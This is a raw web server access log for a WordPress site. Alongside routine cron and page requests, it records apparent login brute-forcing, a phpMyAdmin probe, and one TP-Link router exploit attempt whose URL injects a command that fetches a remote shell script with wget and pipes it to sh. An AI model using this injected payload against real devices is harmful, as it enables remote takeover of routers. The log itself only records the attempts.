36.133.115.36 - - [27/Aug/2025:21:39:46 +0800] "POST /wp-cron.php?doing_wp_cron=1756301986.3419280052185058593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
157.245.89.176 - - [27/Aug/2025:21:39:46 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
157.245.89.176 - - [27/Aug/2025:21:39:48 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [27/Aug/2025:21:46:35 +0800] "POST /wp-cron.php?doing_wp_cron=1756302395.2536249160766601562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
192.250.235.41 - - [27/Aug/2025:21:46:35 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0"
192.250.235.41 - - [27/Aug/2025:21:46:36 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
36.133.115.36 - - [27/Aug/2025:21:48:34 +0800] "POST /wp-cron.php?doing_wp_cron=1756302514.4069299697875976562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.158.91.71 - - [27/Aug/2025:21:48:34 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [27/Aug/2025:21:51:00 +0800] "POST /wp-cron.php?doing_wp_cron=1756302660.6642580032348632812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
70.66.93.109 - - [27/Aug/2025:21:51:00 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 301 5 "-" "-"
195.15.194.52 - - [27/Aug/2025:21:51:19 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
195.15.194.52 - - [27/Aug/2025:21:51:21 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [27/Aug/2025:21:55:29 +0800] "POST /wp-cron.php?doing_wp_cron=1756302929.7262289524078369140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
8.137.58.187 - - [27/Aug/2025:21:55:29 +0800] "GET /phpmyadmin HTTP/1.1" 404 31381 "http://36.133.115.36:80/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
